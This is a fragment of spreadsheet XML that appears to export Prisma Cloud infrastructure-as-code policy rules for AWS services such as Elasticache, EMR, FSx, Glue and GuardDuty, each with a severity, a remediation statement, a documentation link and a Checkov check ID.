      <c r="U770" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V770" t="inlineStr">
        <is>
          <t>IaC:General:aws-elasticache-replication-group</t>
        </is>
      </c>
      <c r="W770" t="inlineStr">
        <is>
          <t>Ensure Elasticache replication group is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X770" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-111</t>
        </is>
      </c>
      <c r="Y770" t="inlineStr"/>
      <c r="Z770" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_elasticache_replication_group"]}</t>
        </is>
      </c>
      <c r="AA770" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB770" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC770" t="inlineStr">
        <is>
          <t>CKV_AWS_191</t>
        </is>
      </c>
      <c r="AD770" t="b">
        <v>1</v>
      </c>
      <c r="AE770" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF770" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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0" t="inlineStr">
        <is>
          <t>af6fb536-8fb7-4b60-a116-7fd9c5d5fd48</t>
        </is>
      </c>
      <c r="AI770" t="inlineStr"/>
      <c r="AJ770" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK770" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="771">
      <c r="A771" t="inlineStr"/>
      <c r="B771" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C771" s="2" t="inlineStr"/>
      <c r="D771" t="inlineStr"/>
      <c r="E771" t="inlineStr"/>
      <c r="F771" t="inlineStr"/>
      <c r="G771" t="b">
        <v>1</v>
      </c>
      <c r="H7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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J771" t="inlineStr">
        <is>
          <t>IaC:General:aws-elasticsearch</t>
        </is>
      </c>
      <c r="K771" t="inlineStr">
        <is>
          <t>Elasticsearch domains are not configured with a minimum of three dedicated master nodes</t>
        </is>
      </c>
      <c r="L771" t="inlineStr"/>
      <c r="M771" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N771" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O771" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P771" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q771" t="inlineStr"/>
      <c r="R771" t="inlineStr"/>
      <c r="S771" t="inlineStr"/>
      <c r="T771" t="b">
        <v>0</v>
      </c>
      <c r="U771" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V771" t="inlineStr">
        <is>
          <t>IaC:General:aws-elasticsearch-domain,aws-opensearch-domain</t>
        </is>
      </c>
      <c r="W771" t="inlineStr">
        <is>
          <t>Ensure Elasticsearch domains are configured with at least three dedicated master nodes for HA</t>
        </is>
      </c>
      <c r="X771" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-318</t>
        </is>
      </c>
      <c r="Y771" t="inlineStr"/>
      <c r="Z771" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_elasticsearch_domain","aws_opensearch_domain"]}</t>
        </is>
      </c>
      <c r="AA771" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB771" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC771" t="inlineStr">
        <is>
          <t>CKV_AWS_318</t>
        </is>
      </c>
      <c r="AD771" t="b">
        <v>1</v>
      </c>
      <c r="AE771" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF771" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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1" t="inlineStr">
        <is>
          <t>8461fa0f-f4df-4bb0-8e3e-f69028fa76af</t>
        </is>
      </c>
      <c r="AI771" t="inlineStr"/>
      <c r="AJ771" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK771" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="772">
      <c r="A772" t="inlineStr"/>
      <c r="B772" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C772" s="2" t="inlineStr"/>
      <c r="D772" t="inlineStr"/>
      <c r="E772" t="inlineStr"/>
      <c r="F772" t="inlineStr"/>
      <c r="G772" t="b">
        <v>1</v>
      </c>
      <c r="H7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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J772" t="inlineStr">
        <is>
          <t>IaC:General:aws-elb</t>
        </is>
      </c>
      <c r="K772" t="inlineStr">
        <is>
          <t>Elastic load balancers do not use SSL Certificates provided by AWS Certificate Manager</t>
        </is>
      </c>
      <c r="L772" t="inlineStr"/>
      <c r="M772" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N772" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O772" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P772" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q772" t="inlineStr"/>
      <c r="R772" t="inlineStr"/>
      <c r="S772" t="inlineStr"/>
      <c r="T772" t="b">
        <v>0</v>
      </c>
      <c r="U772" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V772" t="inlineStr">
        <is>
          <t>IaC:General:aws-elb</t>
        </is>
      </c>
      <c r="W772" t="inlineStr">
        <is>
          <t>Ensure that Elastic Load Balancer(s) uses SSL certificates provided by AWS Certificate Manager</t>
        </is>
      </c>
      <c r="X772" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-that-elastic-load-balancers-uses-ssl-certificates-provided-by-aws-certificate-manager</t>
        </is>
      </c>
      <c r="Y772" t="inlineStr"/>
      <c r="Z772" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_elb"]}</t>
        </is>
      </c>
      <c r="AA772" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB772" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC772" t="inlineStr">
        <is>
          <t>CKV_AWS_127</t>
        </is>
      </c>
      <c r="AD772" t="b">
        <v>1</v>
      </c>
      <c r="AE772" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF772" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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2" t="inlineStr">
        <is>
          <t>684382d1-80a6-472f-950d-e5b00ebb7acc</t>
        </is>
      </c>
      <c r="AI772" t="inlineStr"/>
      <c r="AJ772" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK772" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="773">
      <c r="A773" t="inlineStr"/>
      <c r="B773" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C773" s="2" t="inlineStr"/>
      <c r="D773" t="inlineStr"/>
      <c r="E773" t="inlineStr"/>
      <c r="F773" t="inlineStr"/>
      <c r="G773" t="b">
        <v>1</v>
      </c>
      <c r="H7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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J773" t="inlineStr">
        <is>
          <t>IaC:General:aws-emr</t>
        </is>
      </c>
      <c r="K773" t="inlineStr">
        <is>
          <t>Security configuration of the EMR Cluster does not ensure the encryption of EBS disks</t>
        </is>
      </c>
      <c r="L773" t="inlineStr"/>
      <c r="M773" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N773" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O773" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P773" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q773" t="inlineStr"/>
      <c r="R773" t="inlineStr"/>
      <c r="S773" t="inlineStr"/>
      <c r="T773" t="b">
        <v>0</v>
      </c>
      <c r="U773" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V773" t="inlineStr">
        <is>
          <t>IaC:General:aws-emr-security-configuration</t>
        </is>
      </c>
      <c r="W773" t="inlineStr">
        <is>
          <t>Ensure EMR Cluster security configuration encrypts ebs disks</t>
        </is>
      </c>
      <c r="X773" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-350</t>
        </is>
      </c>
      <c r="Y773" t="inlineStr"/>
      <c r="Z773" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_emr_security_configuration"]}</t>
        </is>
      </c>
      <c r="AA773" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB773" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC773" t="inlineStr">
        <is>
          <t>CKV_AWS_350</t>
        </is>
      </c>
      <c r="AD773" t="b">
        <v>1</v>
      </c>
      <c r="AE773" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF773" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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3" t="inlineStr">
        <is>
          <t>8f86afb7-27c2-48b4-9549-a1d0fac4deaa</t>
        </is>
      </c>
      <c r="AI773" t="inlineStr"/>
      <c r="AJ773" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK773" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="774">
      <c r="A774" t="inlineStr"/>
      <c r="B774" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C774" s="2" t="inlineStr"/>
      <c r="D774" t="inlineStr"/>
      <c r="E774" t="inlineStr"/>
      <c r="F774" t="inlineStr"/>
      <c r="G774" t="b">
        <v>1</v>
      </c>
      <c r="H7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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J774" t="inlineStr">
        <is>
          <t>IaC:General:aws-fsx</t>
        </is>
      </c>
      <c r="K774" t="inlineStr">
        <is>
          <t>AWS lustre file system not configured with CMK key</t>
        </is>
      </c>
      <c r="L774" t="inlineStr"/>
      <c r="M774" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N774" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O774" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P774" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q774" t="inlineStr"/>
      <c r="R774" t="inlineStr"/>
      <c r="S774" t="inlineStr"/>
      <c r="T774" t="b">
        <v>0</v>
      </c>
      <c r="U774" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V774" t="inlineStr">
        <is>
          <t>IaC:General:aws-fsx-lustre-file-system</t>
        </is>
      </c>
      <c r="W774" t="inlineStr">
        <is>
          <t>Ensure lustre file systems is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X774" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-110</t>
        </is>
      </c>
      <c r="Y774" t="inlineStr"/>
      <c r="Z774" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_fsx_lustre_file_system"]}</t>
        </is>
      </c>
      <c r="AA774" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB774" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC774" t="inlineStr">
        <is>
          <t>CKV_AWS_190</t>
        </is>
      </c>
      <c r="AD774" t="b">
        <v>1</v>
      </c>
      <c r="AE774" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF774" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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4" t="inlineStr">
        <is>
          <t>db822ebc-4618-4d2d-9ea0-e813bf4912a4</t>
        </is>
      </c>
      <c r="AI774" t="inlineStr"/>
      <c r="AJ774" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK774" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="775">
      <c r="A775" t="inlineStr"/>
      <c r="B775" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C775" s="2" t="inlineStr"/>
      <c r="D775" t="inlineStr"/>
      <c r="E775" t="inlineStr"/>
      <c r="F775" t="inlineStr"/>
      <c r="G775" t="b">
        <v>1</v>
      </c>
      <c r="H7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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J775" t="inlineStr">
        <is>
          <t>IaC:General:aws-fsx</t>
        </is>
      </c>
      <c r="K775" t="inlineStr">
        <is>
          <t>AWS FSX openzfs is not encrypted by AWS' Key Management Service (KMS) using a Customer Managed Key (CMK)</t>
        </is>
      </c>
      <c r="L775" t="inlineStr"/>
      <c r="M775" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N775" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O775" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P775" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q775" t="inlineStr"/>
      <c r="R775" t="inlineStr"/>
      <c r="S775" t="inlineStr"/>
      <c r="T775" t="b">
        <v>0</v>
      </c>
      <c r="U775" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V775" t="inlineStr">
        <is>
          <t>IaC:General:aws-fsx-openzfs-file-system</t>
        </is>
      </c>
      <c r="W775" t="inlineStr">
        <is>
          <t>Ensure resource is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X775" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-fsx-openzfs-file-system-is-encrypted-by-aws-key-management-service-kms-using-a-customer-managed-key-cmk</t>
        </is>
      </c>
      <c r="Y775" t="inlineStr"/>
      <c r="Z775" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_fsx_openzfs_file_system"]}</t>
        </is>
      </c>
      <c r="AA775" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB775" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC775" t="inlineStr">
        <is>
          <t>CKV_AWS_203</t>
        </is>
      </c>
      <c r="AD775" t="b">
        <v>1</v>
      </c>
      <c r="AE775" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF775" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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5" t="inlineStr">
        <is>
          <t>8b9b123e-9516-47db-a8e2-8674b768e989</t>
        </is>
      </c>
      <c r="AI775" t="inlineStr"/>
      <c r="AJ775" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK775" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="776">
      <c r="A776" t="inlineStr"/>
      <c r="B776" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C776" s="2" t="inlineStr"/>
      <c r="D776" t="inlineStr"/>
      <c r="E776" t="inlineStr"/>
      <c r="F776" t="inlineStr"/>
      <c r="G776" t="b">
        <v>1</v>
      </c>
      <c r="H7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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J776" t="inlineStr">
        <is>
          <t>IaC:General:aws-fsx</t>
        </is>
      </c>
      <c r="K776" t="inlineStr">
        <is>
          <t>AWS FSX Windows filesystem not encrypted using Customer Managed Key</t>
        </is>
      </c>
      <c r="L776" t="inlineStr"/>
      <c r="M776" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N776" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O776" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P776" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q776" t="inlineStr"/>
      <c r="R776" t="inlineStr"/>
      <c r="S776" t="inlineStr"/>
      <c r="T776" t="b">
        <v>0</v>
      </c>
      <c r="U776" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V776" t="inlineStr">
        <is>
          <t>IaC:General:aws-fsx-windows-file-system</t>
        </is>
      </c>
      <c r="W776" t="inlineStr">
        <is>
          <t>Ensure FSX Windows filesystem is encrypted by KMS using a customer managed Key (CMK)</t>
        </is>
      </c>
      <c r="X776" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-99</t>
        </is>
      </c>
      <c r="Y776" t="inlineStr"/>
      <c r="Z776" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_fsx_windows_file_system"]}</t>
        </is>
      </c>
      <c r="AA776" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB776" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC776" t="inlineStr">
        <is>
          <t>CKV_AWS_179</t>
        </is>
      </c>
      <c r="AD776" t="b">
        <v>1</v>
      </c>
      <c r="AE776" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF776" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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6" t="inlineStr">
        <is>
          <t>4a813b6d-315e-4a4c-bef8-6266b8c8290f</t>
        </is>
      </c>
      <c r="AI776" t="inlineStr"/>
      <c r="AJ776" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK776" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="777">
      <c r="A777" t="inlineStr"/>
      <c r="B777" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C777" s="2" t="inlineStr"/>
      <c r="D777" t="inlineStr"/>
      <c r="E777" t="inlineStr"/>
      <c r="F777" t="inlineStr"/>
      <c r="G777" t="b">
        <v>1</v>
      </c>
      <c r="H7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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J777" t="inlineStr">
        <is>
          <t>IaC:General:aws-glue</t>
        </is>
      </c>
      <c r="K777" t="inlineStr">
        <is>
          <t>Glue Data Catalog encryption is not enabled</t>
        </is>
      </c>
      <c r="L777" t="inlineStr"/>
      <c r="M777" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N777" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O777" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P777" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q777" t="inlineStr"/>
      <c r="R777" t="inlineStr"/>
      <c r="S777" t="inlineStr"/>
      <c r="T777" t="b">
        <v>0</v>
      </c>
      <c r="U777" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V777" t="inlineStr">
        <is>
          <t>IaC:General:aws-glue-data-catalog-encryption-settings</t>
        </is>
      </c>
      <c r="W777" t="inlineStr">
        <is>
          <t>Ensure Glue Data Catalog Encryption is enabled</t>
        </is>
      </c>
      <c r="X777" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-37</t>
        </is>
      </c>
      <c r="Y777" t="inlineStr"/>
      <c r="Z777" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_glue_data_catalog_encryption_settings"]}</t>
        </is>
      </c>
      <c r="AA777" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB777" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC777" t="inlineStr">
        <is>
          <t>CKV_AWS_94</t>
        </is>
      </c>
      <c r="AD777" t="b">
        <v>1</v>
      </c>
      <c r="AE777" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF777" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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7" t="inlineStr">
        <is>
          <t>e2dd25ba-7500-4de9-8a71-903cf1e7542f</t>
        </is>
      </c>
      <c r="AI777" t="inlineStr"/>
      <c r="AJ777" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK777" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="778">
      <c r="A778" t="inlineStr"/>
      <c r="B778" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C778" s="2" t="inlineStr"/>
      <c r="D778" t="inlineStr"/>
      <c r="E778" t="inlineStr"/>
      <c r="F778" t="inlineStr"/>
      <c r="G778" t="b">
        <v>1</v>
      </c>
      <c r="H7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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J778" t="inlineStr">
        <is>
          <t>IaC:General:aws-glue</t>
        </is>
      </c>
      <c r="K778" t="inlineStr">
        <is>
          <t>AWS Glue component is not associated with a security configuration</t>
        </is>
      </c>
      <c r="L778" t="inlineStr"/>
      <c r="M778" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N778" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O778" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P778" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q778" t="inlineStr"/>
      <c r="R778" t="inlineStr"/>
      <c r="S778" t="inlineStr"/>
      <c r="T778" t="b">
        <v>0</v>
      </c>
      <c r="U778" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V778" t="inlineStr">
        <is>
          <t>IaC:General:aws-glue-job,AWS::Glue::Crawler,AWS::Glue::Job,aws-glue-crawler,AWS::Glue::DevEndpoint,aws-glue-dev-endpoint</t>
        </is>
      </c>
      <c r="W778" t="inlineStr">
        <is>
          <t>Ensure Glue component has a security configuration associated</t>
        </is>
      </c>
      <c r="X778" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-aws-glue-component-is-associated-with-a-security-configuration</t>
        </is>
      </c>
      <c r="Y778" t="inlineStr"/>
      <c r="Z778" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_glue_job", "AWS::Glue::Crawler", "AWS::Glue::Job", "aws_glue_crawler", "AWS::Glue::DevEndpoint", "aws_glue_dev_endpoint"]}</t>
        </is>
      </c>
      <c r="AA778" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB778" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC778" t="inlineStr">
        <is>
          <t>CKV_AWS_195</t>
        </is>
      </c>
      <c r="AD778" t="b">
        <v>1</v>
      </c>
      <c r="AE778" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF778" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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8" t="inlineStr">
        <is>
          <t>35f1c888-1566-49c5-bd40-c10b6a152ce8</t>
        </is>
      </c>
      <c r="AI778" t="inlineStr"/>
      <c r="AJ778" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK778" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="779">
      <c r="A779" t="inlineStr"/>
      <c r="B779" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C779" s="2" t="inlineStr"/>
      <c r="D779" t="inlineStr"/>
      <c r="E779" t="inlineStr"/>
      <c r="F779" t="inlineStr"/>
      <c r="G779" t="b">
        <v>1</v>
      </c>
      <c r="H7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79" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J779" t="inlineStr">
        <is>
          <t>IaC:General:aws-glue</t>
        </is>
      </c>
      <c r="K779" t="inlineStr">
        <is>
          <t>AWS Glue security configuration encryption is not enabled</t>
        </is>
      </c>
      <c r="L779" t="inlineStr"/>
      <c r="M779" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N779" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O779" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P779" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q779" t="inlineStr"/>
      <c r="R779" t="inlineStr"/>
      <c r="S779" t="inlineStr"/>
      <c r="T779" t="b">
        <v>0</v>
      </c>
      <c r="U779" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V779" t="inlineStr">
        <is>
          <t>IaC:General:aws-glue-security-configuration</t>
        </is>
      </c>
      <c r="W779" t="inlineStr">
        <is>
          <t>Ensure Glue Security Configuration Encryption is enabled</t>
        </is>
      </c>
      <c r="X779" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/bc-aws-general-41</t>
        </is>
      </c>
      <c r="Y779" t="inlineStr"/>
      <c r="Z779" t="inlineStr">
        <is>
          <t>{"category":"General","resourceTypes":["aws_glue_security_configuration"]}</t>
        </is>
      </c>
      <c r="AA779" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB779" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC779" t="inlineStr">
        <is>
          <t>CKV_AWS_99</t>
        </is>
      </c>
      <c r="AD779" t="b">
        <v>1</v>
      </c>
      <c r="AE779" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF779" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG7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79" t="inlineStr">
        <is>
          <t>348170ea-b358-49bd-adf1-f30f5665b9ae</t>
        </is>
      </c>
      <c r="AI779" t="inlineStr"/>
      <c r="AJ779" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK779" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="780">
      <c r="A780" t="inlineStr"/>
      <c r="B780" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C780" s="2" t="inlineStr"/>
      <c r="D780" t="inlineStr"/>
      <c r="E780" t="inlineStr"/>
      <c r="F780" t="inlineStr"/>
      <c r="G780" t="b">
        <v>1</v>
      </c>
      <c r="H7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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J780" t="inlineStr">
        <is>
          <t>IaC:General:aws-guardduty</t>
        </is>
      </c>
      <c r="K780" t="inlineStr">
        <is>
          <t>GuardDuty is not enabled to specific org/region</t>
        </is>
      </c>
      <c r="L780" t="inlineStr"/>
      <c r="M780" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N780" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O780" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P780" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q780" t="inlineStr"/>
      <c r="R780" t="inlineStr"/>
      <c r="S780" t="inlineStr"/>
      <c r="T780" t="b">
        <v>0</v>
      </c>
      <c r="U780" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V780" t="inlineStr">
        <is>
          <t>IaC:General:aws-guardduty-organization-configuration,aws-guardduty-detector</t>
        </is>
      </c>
      <c r="W780" t="inlineStr">
        <is>
          <t>Ensure GuardDuty is enabled to specific org/region</t>
        </is>
      </c>
      <c r="X780" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-guardduty-is-enabled-to-specific-orgregion</t>
        </is>
